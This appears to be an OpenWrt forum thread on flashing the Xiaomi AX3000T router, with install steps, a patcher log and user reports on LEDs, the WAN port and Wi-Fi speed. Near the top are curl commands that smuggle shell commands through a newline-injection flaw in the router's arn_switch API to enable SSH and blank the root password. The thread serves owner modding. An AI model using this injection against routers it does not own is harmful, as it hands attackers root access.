TOH: https://openwrt.org/inbox/toh/xiaomi/ax3000t

SSH access:

A vulnerability is exploited in function arn_switch , which is present only in firmware v1.0.47

1. Difficult method
curl -X POST "http://192.168.31.1/cgi-bin/luci/;stok=*******/api/misystem/arn_switch" -d "open=1&model=1&level=%0Anvram%20set%20ssh_en%3D1%0A"
curl -X POST "http://192.168.31.1/cgi-bin/luci/;stok=*******/api/misystem/arn_switch" -d "open=1&model=1&level=%0Anvram%20commit%0A"
curl -X POST "http://192.168.31.1/cgi-bin/luci/;stok=*******/api/misystem/arn_switch" -d "open=1&model=1&level=%0Ased%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%22debug%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%0A"
curl -X POST "http://192.168.31.1/cgi-bin/luci/;stok=*******/api/misystem/arn_switch" -d "open=1&model=1&level=%0A%2Fetc%2Finit.d%2Fdropbear%20start%0A"
curl -X POST "http://192.168.31.1/cgi-bin/luci/;stok=********/api/misystem/arn_switch" -d "open=1&model=1&level=%0Apasswd%20-d%20root%0A
  • Download XMiR-Patcher and unpack into any directory
  • Execute !START.bat (or run.sh on *nix machine)
  • Execute 2
  • Download XMiR-Patcher and unpack into any directory
  • Copy UBInized image openwrt-mediatek-filogic-xiaomi_mi-router-ax3000t-initramfs-factory.ubi into directory firmware
  • Execute !START.bat (or run.sh on *nix machine)
  • Execute 2
  • Execute 7
  • Wait 40...70 seconds
  • Browse 192.168.1.1
  • Using LuCI flash sysupgrade image openwrt-mediatek-filogic-xiaomi_mi-router-ax3000t-squashfs-sysupgrade.bin
  • Wait 40...70 seconds
  • Revert to stock firmware:

  • Download facinstall package and install its
  • Using LuCI flash stock image
  • Instruction for RD23 (INT version):

    Xiaomi AX3000T RD23 (Global version): OpenWrt installation guide for installing OpenWrt on the Xiaomi AX3000T RD23 (Global Version). installation method: UART Flash. ** the following OpenWrt installation method requires opening the device, connecting a UART cable, and following a specific set of steps. warning This process is recommended only for advanced users, and may soft-brick your device. Please do not forget to make a backup of original router partitions before performing any actions …

    I just followed the "Easy Method" to install OpenWrt, and unfortunately it bricked my device (orange led during power on, then it turns off and nothing else happens). See XMiR-Pactcher output below.

    My device was configured as Access Point in the original firmware, I'm not sure if this could cause the issue. When I have time I will try to unbrick it and try again.

    ==========================================================
    Xiaomi MiR Patcher
     1 - Set IP-address (current value: 192.168.1.128)
     2 - Connect to device (install exploit)
     3 - Read full device info
     4 - Create full backup
     5 - Install EN/RU languages
     6 - Install Breed bootloader
     7 - Install firmware (from directory "firmware")
     8 - {{{ Other functions }}}
     9 - [[ Reboot device ]]
     0 - Exit
    Select: 2
    device_name = RD03
    rom_version = 1.0.47 release
    mac address = 7c:83:xx:xx:xx:xx
    Current CountryCode = CN
    Enter device WEB password: xxxxxxx
    Run SSH server on port 22 ...
    #### SSH server are activated! ####
    ==========================================================
    Xiaomi MiR Patcher
     1 - Set IP-address (current value: 192.168.1.128)
     2 - Connect to device (install exploit)
     3 - Read full device info
     4 - Create full backup
     5 - Install EN/RU languages
     6 - Install Breed bootloader
     7 - Install firmware (from directory "firmware")
     8 - {{{ Other functions }}}
     9 - [[ Reboot device ]]
     0 - Exit
    Select: 7
    device: "RD03"
    img_write = True
    Image files in directory "firmware/":
      "firmware/openwrt-mediatek-filogic-xiaomi_mi-router-ax3000t-stock-initramfs-factory.ubi"
    Download file: "/tmp/dmesg.log" ....
    Download file: "/tmp/mtd_list.txt" ....
    Download file: "/tmp/mtd_addr.txt" ....
    Download file: "/tmp/mtd_ro.txt" ....
    Download file: "/tmp/kcmdline.log" ....
    Parse all images...
    UBI: filetype: b'UBI#'
    UBI: Decoding UBIFS...
    UBI:   volume: "kernel"          size: 19173376
    parse_ubifs = 1
    FIT size = 0x123CA10 (18674 KiB)
    FIT: name = "ARM64 OpenWrt FIT (Flattened Image Tree)"
    FIT: def_cfg: "config-1"
    FIT: def_fdt: "fdt-1"
    FDT: desc = "ARM64 OpenWrt xiaomi_mi-router-ax3000t-stock device tree blob"
    FDT: type = "flat_dt"
    FDT: arch = "arm64"
    KRN: desc = "ARM64 OpenWrt Linux-5.15.137"
    KRN: type = "kernel"
    KRN: arch = "arm64"
    KRN: compression = "lzma"
    KRN: data = 3770699 bytes
    FDT: compatible = ['xiaomi,mi-router-ax3000t-stock', 'mediatek,mt7981']
    FDT: model = "Xiaomi Mi Router AX3000T (stock layout)"
    FDT: dt_part: ['/spi@1100a000/flash@0/partitions']
    FIT: Founded "initrd-1" node
    FIT: initrd image name: "ARM64 OpenWrt xiaomi_mi-router-ax3000t-stock initrd"
    fw_img: 20224 KiB | kernel: 18674 KiB | rootfs: 14968 KiB
    Download file: "/tmp/bl_BL2.bin" ....
    Download file: "/tmp/bl_FIP.bin" ....
    Download file: "/tmp/env_Nvram.bin" ....
    Download file: "/tmp/env_Bdata.bin" ....
    Download file: "/tmp/env_BL2.bin" ....
    current flag_boot_rootfs = 0
    install_method = 400
    --------- prepare command lines -----------
    fw_img: 20224 KiB | kernel: 18674 KiB | rootfs: 14968 KiB
    ------------- flash images -------------
    Upload file: "tmp/fw/fw_img.bin" ....
    Run scripts for change NVRAM params...
    Boot from firmware [1] activated.
    Writing firmware image to addr 0x02800000 ...
      mtd -e "ubi1" write "/tmp/fw_img.bin" "ubi1"
    The firmware has been successfully flashed!
    Send command "reboot" via SSH/Telnet ...
    ERROR: SSH execute command timed out! CMD: "reboot -f"
    ==========================================================
    Xiaomi MiR Patcher
     1 - Set IP-address (current value: 192.168.1.128)
     2 - Connect to device (install exploit)
     3 - Read full device info
     4 - Create full backup
     5 - Install EN/RU languages
     6 - Install Breed bootloader
     7 - Install firmware (from directory "firmware")
     8 - {{{ Other functions }}}
     9 - [[ Reboot device ]]
     0 - Exit
    Select:
                  

    Update 1: my device was not really bricked, OpenWrt install was actually sucessfull. Some notes here that may help others in the future:

  • It seems that the standard OpenWrt LED behavior is configured differently in remittor's build (I was expecting a quick orange blink then slow blink while OpenWrt loads, then steady blue when OpenWrt boot completes). So after OpenWrt boots with remittor's build, the AX3000T LED behavior is to go from solid orange to off (probably LED is reporting the WAN status, but I haven't tested to confirm this since I did not have a WAN connection during the flashing procedure).
  • This device does not have the WAN port clearly identified (I believe that the original firmware can use any port as WAN, but I'm not sure). The WAN port used by OpenWrt is the one close to the power connector. I was using this port after the initial OpenWrt flash, and for this reason I had no access to 192.168.1.1. I just connected the ethernet cable to another Ethernet port and everything worked as expected.
  • Update 2: just flashed the WR30U image and the AX3000T LED is now working fine (it is reporting system status, orange flashing quickly then slowly when OpenWrt boots, then steady blue when OpenWrt boot completes).

    dsouza:

    then steady blue when OpenWrt boot completes). So after OpenWrt boots with remittor's build, the AX3000T LED behavior is to go from solid orange to off

    I fixed this now.

    FWIW I firstly flashed ubootmod build from Dimfish and since I wanted to use builds from eko.one.pl, I flashed WR30U image and everything seems to be working fine - except for NFC, which I don't use.

    At one point I made a mistake and feared I bricked my router (with i_want_a_brick) - it powered on with a blue light, responded to ping on 192.168.1.1 but with no open ports. It turned out that this is a recovery mode and it looks for a TFTP server at 192.168.1.254.

    Does it matter where I buy this router from when it comes to channel availability/restrictions?

    Since routers for the Chinese market usually do not support 5GHz channels between 96 - 144, for Mediatek based platforms like this Xiaomi is it hardware limited in the SOC or it it only software limited and can these channels be used in OpenWRT?

    Just flashed the latest build from Remittor using XMiR-Patcher. The instructions worked first try, my AX3000T was on stock firmware 1.0.47 from the factory.

    Looking good so far, I did a quick iperf3 test;
    Server: Laptop, wired connection (1Gbit) direct to router.
    Client: iPhone 12 connected to 5 GHz network from router @ 1 meter distance.

    Both tests are on 5 GHz channel 149.

    I also got good Wifi speeds (802.11ax@80MHz) close to the AX3000T (line of sight, same room).

    However when testing WiFi speed in another room with a brick wall between the device (iPhone 13 Pro) and the AX3000T, Wifi speeds were really bad. If possible, could you please test AX3000T WiFi speeds in another room, especially upload speeds?

    I am wondering this device is suffering the same issue as the Redmi AX6S/Xiaomi AX3200/Belkin RT2000, which was only solved after disabling 160MHz support from the build - details below:

    [Solved] 802.11ax worse than 802.11ac with mt76 driver? Network and Wireless Configuration I just upgraded one of my access points from an Archer C6 v3.2 to a Redmi AX6S. Since the new device has support to 802.11ax on the 5Ghz band, I`ve decided to do some tests. While in the same room 802.11ax has a higher throughput than 802.11ac (tested with iPerf3 on a wired Linux machine and and iPhone 13Pro), the performance of 802.11ax in another room across one brick wall is much worse than 802.11ac (see results below). I had the assumption that 802.11ax would always have a superior perfor…

    When I have time I will do additional tests with the AX3000T and apply the workarounds in the above thread to see if it improves the Wifi speeds in this situation.

    Sure, if I don't forget I will try more tests one of these days and report back.

    I was playing around with 80 and 160 MHz on different channels and noticed something interesting.
    When I select 160 MHz and set the channel to 149 or higher the wireless overview shows the corresponding frequency somewhere in the 6 GHz band (channel 165 as 6.775 GHz, suggesting WiFi 6E?!). My WiFi 5/6 devices can't see the network at all anymore, unfortunately I can't tell if it's actually transmitting at 6 GHz as I don't have any 6E devices yet.
    So far I found one post mentioning this on a different MTK chipset, but it seems the other way round than what I see: